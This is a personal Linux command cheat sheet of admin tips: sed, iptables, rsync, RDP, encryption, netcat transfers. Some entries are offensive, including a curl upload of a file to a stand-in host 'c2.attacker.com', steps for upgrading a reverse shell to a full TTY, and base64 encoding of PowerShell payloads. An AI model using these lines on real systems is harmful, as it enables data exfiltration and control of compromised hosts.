Skip to content

Useful commands in Linux #

comm #

  • Substitute if not satisfied with diff1
    1
    comm <-123> file1 file2 2>/dev/null
    

read #

  • Used for pausing mid loop and possibly asking for user input
  • Usually seen with <Press any key to continue>
    1
    2
    # Command below will pause the bash script till <space> is pressed
    read -s -d ' '
    

Recursive sed #

  • In case you want to change values in a lot of text files
  • One of the many ways 2
  • Change the 4 values between < >
    1
    find <DIRECTORY_TO_FIND_FROM> \( -type d -name <DIRECTORY_YOU_WANT_TO_AVOID> -prune \) -o -type f -print0 | xargs -0 sed -i 's/<ORIGINAL_TEXT>/<NEW_TEXT>/g'
    

shred #

  • Delete files
  • This cannot easily although still possible to be recovered
    1
    shred -u <file_to_delete>
    

testdisk #

  • Recover accidentally deleted file (i.e. using rm)3
    1
    2
    sudo testdisk
    # View step 8 of the source. Select the option "Undelete" might not be there, choose "List"
    

ps (Wide output) #

  • Everybody knows ps aux
  • this however generates a limited output
  • to show the whole command, do: (add or lessen 'w' if needed)
    1
    ps auxwww
    

grep #

  • Asides from the common uses of grep
  • to filter out all lines ending in a specific character
    • Use case: filtering out exported URLs which has duplicates where one URL ends in '/' and one without
       1
       2
       3
       4
       5
       6
       7
       8
       9
      10
      11
      echo "aaaaaaa.rar\nbbbbbbbbrar" > /tmp/temp.txt
      
      $ cat /tmp/temp.txt | grep 'rar$'
      aaaaaaa.rar
      bbbbbbbbrar
      
      #Add '\b' for "word-boundary"
      $ cat /tmp/temp.txt | grep '\brar$'
      aaaaaaa.rar
      
      #Just add '-v' after 'grep' to "select non-matching lines" / inverse
      

RDP #

  • Connecting to a Windows host via RDP
    1
     xfreerdp +nego +sec-rdp +sec-tls +sec-nla /v:<hostname/IP>  /d: /u:<username> /p:<password> /size:90%
    
  • Compressed RDP for low bandwidth or slow RDP connections
    1
    2
    3
    4
    5
    6
    7
    8
    # MTU config first
    ifconfig mtu 1200 <interface>
    ifconfig mtu 1200 tun0
    
    # rdesktop
    rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
    rdesktop -d <domain> -u <username> -p <password or '-' for prompt> -a 16 -P -z -E -T <TAG-WindowName> <RDPHOST_IP>
    rdesktop -d company.local -u administrator -p [email protected] -a 16 -P -z -E -T COMPANY-DC3 10.10.10.100
    

iptables 45 #

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
# View rules
sudo iptables -L --line-numbers

# Add rule
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

# Drop from everybody else
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

# Save rules
sudo /sbin/iptables–save

# Delete Rule
sudo iptables -D INPUT <line_num>

# Example:
# Only allow SSH connection from 192.168.1.0/24
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

Mirror a website #

1
wget --mirror --convert-links --adjust-extension --page-requisites --wait=1 -o wget-mirror.log --no-parent https://example.org

Upload files via Curl #

  • Combine with Simple HTTP(s) Servers
    1
    2
    curl -k --user 'root:toor' --upload-file file.zip https://127.0.0.1:8000/file.zip
    curl -k --user 'root:haxorz' --upload-file file.zip https://c2.attacker.com:443/file.zip
    

Upgrade Reverse shell to fully interactive TTY6 #

  • In reverse shell
    1
    2
    python -c 'import pty; pty.spawn("/bin/bash")'
    <Ctrl-Z>
    
  • In Attacker console
    1
    2
    stty raw -echo
    fg
    
  • In reverse shell
    1
    2
    3
    4
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows <num> columns <cols>
    

Create a user #

1
2
3
4
# Create a user
useradd user -U -s /bin/bash
# Create a sudo user
useradd user -G sudo -U -s /bin/bash

Transfer files using nc (netcat)7 #

  • Basic
    1
    2
    3
    4
    # Receiving
    nc -l -p 9999 > received_file.txt
    # Sending
    nc 192.168.0.1 9999 < received_file.txt
    
  • With compression
    1
    2
    3
    4
    # Receiving
    nc -l -p 9999 | xz -dc | tar xvf -
    # Sending
    tar cvf - . | xz -c | nc 192.168.0.1 9999
    

Base64 encode #

  • Some use cases:
    • Encoding Powershell one-liners
      1
      iconv -f ASCII -t UTF-16LE powershell_payload.txt | base64 | tr -d "\n"
      
  • Another way below but prioritize above
    1
    2
    echo -n 'Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"' | iconv -f UTF8 -t UTF16LE | base64 -w 0
    # Remove the % character at the end
    

Rsync #

  • Similar to SCP but better overall especially long term8
    1
    rsync -azP [email protected]:/home/some_directory ./
    

Compressed RDP for low bandwidth #

  • Lower your MTU first
    1
    2
    ifconfig mtu 1200 <interface>
    ifconfig mtu 1200 tun0
    
  • rdesktop
    1
    2
    3
    4
    5
    rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
    rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u master -p masterlab 192.168.1.5
    
    rdesktop -a 16 -P -z -E -T <TAG-WindowName> -d <domain> -u <username> -p <password or '-' for prompt> 192.168.1.5
    rdesktop -a 16 -P -z -E -T COMPANY-DC3 -d company.local -u administrator -p [email protected] 192.168.1.5
    

Encrypting files #

zip8 #

1
2
zip -e secure.tar.xz.zip notsecure.tar.xz -P someGoodPassword
unzip secure.tar.xz.zip

tar & OpenSSL910 #

  • Unreliable decryption (Have not yet figured out if it's due to different openssl versions or arch)
  • This one requires an active tty, need to manually type passphrase
    1
    tar --xz -cvf - *  | openssl enc -e -aes256 -out secured.tar.gz
    
  • Did not work in some instances, try on Debian
    1
    tar --xz -cvf - *  | openssl enc -e -aes256 -out secured.tar.gz -pass file:<( echo -n "someGoodPassword" )
    
  • Decryption
    1
    openssl enc -d -aes256 -in secured.tar.gz | tar --xz -xv
    

Generate random passwords #

1
2
3
4
openssl rand 256 | sha256sum | cut -d " " -f1

SERVICE_PASSWORD=$(openssl rand 32 | sha256sum | cut -d' ' -f1)
echo $SERVICE_PASSWORD

Go through filenames with spaces #

  • Basic11
    1
    2
    3
    4
    find . -type f -name '*.*' -print0 | 
    while IFS= read -r -d '' file; do
        printf '%s\n' "$file"
    done
    
  • Sample Use Case:
    • Export thunderbird inbox to get attachments and move all of the exported attachments into 1 folder for easy viewing/archiving
      • In Thunderbird: ImportExportTools NG -> Export all messages in the folder - > as single text file (with attachments)
      • Sample command:
        1
        find ../Thunderbird_Export/ -type f -name '*.*' -print0 | while IFS= read -r -d '' file; do mv "$file" .;done
        

Last update: May 21, 2021